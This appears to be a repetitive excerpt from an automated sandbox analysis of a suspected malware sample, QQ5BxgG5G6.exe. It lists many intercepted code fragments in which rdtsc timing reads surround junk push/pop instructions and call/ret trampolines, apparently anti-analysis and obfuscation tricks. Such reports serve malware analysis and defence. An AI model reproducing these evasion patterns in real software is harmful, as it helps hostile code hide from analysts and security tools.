              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE14A second address: EDE166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F88DD0CB14Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE166 second address: EDE16B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE16B second address: EDE171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE171 second address: EDE175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE175 second address: EDE185 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE185 second address: EDE220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F88DC6CD036h 0x0000000a popad 0x0000000b jmp 00007F88DC6CD043h 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 jnc 00007F88DC6CD04Fh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e jmp 00007F88DC6CD042h 0x00000023 push eax 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 pop eax 0x00000027 popad 0x00000028 pop eax 0x00000029 pushad 0x0000002a sub dx, 9786h 0x0000002f popad 0x00000030 lea ebx, dword ptr [ebp+12459ABCh] 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F88DC6CD038h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 mov si, di 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push eax 0x00000058 pop eax 0x00000059 pushad 0x0000005a popad 0x0000005b popad 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE220 second address: EDE226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EDE226 second address: EDE233 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFC099 second address: EFC0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFC1CD second address: EFC1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DC6CD041h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFC1E4 second address: EFC1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFC1E9 second address: EFC205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD047h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFC205 second address: EFC20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFC4CF second address: EFC4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFC8D9 second address: EFC8E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F88DD0CB152h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFC8E9 second address: EFC8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFC8EF second address: EFC8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 ja 00007F88DD0CB146h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFCBEA second address: EFCC06 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F88DC6CD036h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F88DC6CD040h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFCC06 second address: EFCC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F88DD0CB146h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F88DD0CB151h 0x00000010 popad 0x00000011 jbe 00007F88DD0CB162h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EF558B second address: EF55A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD045h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFD9EA second address: EFD9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFD9EF second address: EFD9F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFD9F6 second address: EFD9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EFDF8B second address: EFDF9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F88DC6CD036h 0x0000000a jns 00007F88DC6CD036h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F03B49 second address: F03B4F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0904F second address: F09053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F084CD second address: F084D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F084D1 second address: F084D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0860D second address: F0862A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F88DD0CB152h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0862A second address: F08630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F08630 second address: F0863A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F087AF second address: F087BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F087BB second address: F087C3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F087C3 second address: F087E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F88DC6CD03Ah 0x00000009 jmp 00007F88DC6CD043h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F087E4 second address: F087F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F08DCB second address: F08DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F08DD1 second address: F08DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0A71A second address: F0A71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0A71E second address: F0A728 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F88DD0CB146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0A728 second address: F0A72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0A72E second address: F0A744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB151h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EBFC99 second address: EBFC9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0DC97 second address: F0DCA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F88DD0CB146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0DF79 second address: F0DFA1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F88DC6CD03Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F88DC6CD045h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E16E second address: F0E172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E172 second address: F0E176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E42D second address: F0E443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F88DD0CB148h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E443 second address: F0E447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E447 second address: F0E45A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E88A second address: F0E8A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD044h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0E919 second address: F0E91D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0EEA4 second address: F0EEE2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F88DC6CD03Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F88DC6CD038h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D39AEh] 0x0000002b push eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0EEE2 second address: F0EEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0FE07 second address: F0FE38 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and si, 8EC3h 0x00000010 and di, 3803h 0x00000015 push 00000000h 0x00000017 jp 00007F88DC6CD03Bh 0x0000001d push 00000000h 0x0000001f mov esi, ecx 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jl 00007F88DC6CD03Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0FC67 second address: F0FC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0FE38 second address: F0FE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F0FC6B second address: F0FC83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DD0CB14Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F10FE4 second address: F10FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F10FEA second address: F11064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F88DD0CB14Ch 0x0000000a popad 0x0000000b push eax 0x0000000c jg 00007F88DD0CB14Ah 0x00000012 nop 0x00000013 mov esi, ecx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F88DD0CB148h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 movsx esi, si 0x00000034 mov edi, dword ptr [ebp+122D2BA1h] 0x0000003a push 00000000h 0x0000003c jo 00007F88DD0CB14Bh 0x00000042 and si, 5C3Dh 0x00000047 xchg eax, ebx 0x00000048 jmp 00007F88DD0CB152h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jnl 00007F88DD0CB148h 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1071A second address: F1071E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F11064 second address: F11069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F117D5 second address: F117E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD03Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1230A second address: F1230E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F12FB2 second address: F13021 instructions: 0x00000000 rdtsc 0x00000002 js 00007F88DC6CD03Ch 0x00000008 jg 00007F88DC6CD036h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007F88DC6CD03Eh 0x00000017 push edi 0x00000018 jmp 00007F88DC6CD03Eh 0x0000001d pop edi 0x0000001e popad 0x0000001f nop 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F88DC6CD038h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000019h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c mov esi, dword ptr [ebp+1247AF76h] 0x00000042 push 00000000h 0x00000044 jmp 00007F88DC6CD03Dh 0x00000049 xchg eax, ebx 0x0000004a pushad 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F13B01 second address: F13B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F88DD0CB14Ch 0x0000000a jng 00007F88DD0CB146h 0x00000010 popad 0x00000011 push eax 0x00000012 push ecx 0x00000013 pushad 0x00000014 jnl 00007F88DD0CB146h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F13B1D second address: F13B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F88DC6CD038h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D2DD6h], edx 0x00000027 push 00000000h 0x00000029 mov edi, ecx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007F88DC6CD038h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 mov di, 05A0h 0x0000004b xchg eax, ebx 0x0000004c ja 00007F88DC6CD04Dh 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push esi 0x00000056 pushad 0x00000057 popad 0x00000058 pop esi 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F13879 second address: F1387F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1387F second address: F13892 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F88DC6CD036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F13892 second address: F1389C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F88DD0CB146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EBE172 second address: EBE17E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F88DC6CD036h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EBE17E second address: EBE182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F19339 second address: F1933F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC335B second address: EC335F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC335F second address: EC3386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F88DC6CD046h 0x00000007 jng 00007F88DC6CD036h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC3386 second address: EC338A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC338A second address: EC338E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: EC338E second address: EC3394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F19968 second address: F199C3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F88DC6CD03Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F88DC6CD038h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F88DC6CD038h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 push eax 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 push ebx 0x0000004a pop ebx 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1BA8A second address: F1BA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1BA8E second address: F1BA92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1BA92 second address: F1BAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jp 00007F88DD0CB146h 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\QQ5BxgG5G6.exeRDTSC instruction interceptor: First address: F1BAA9 second address: F1BAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
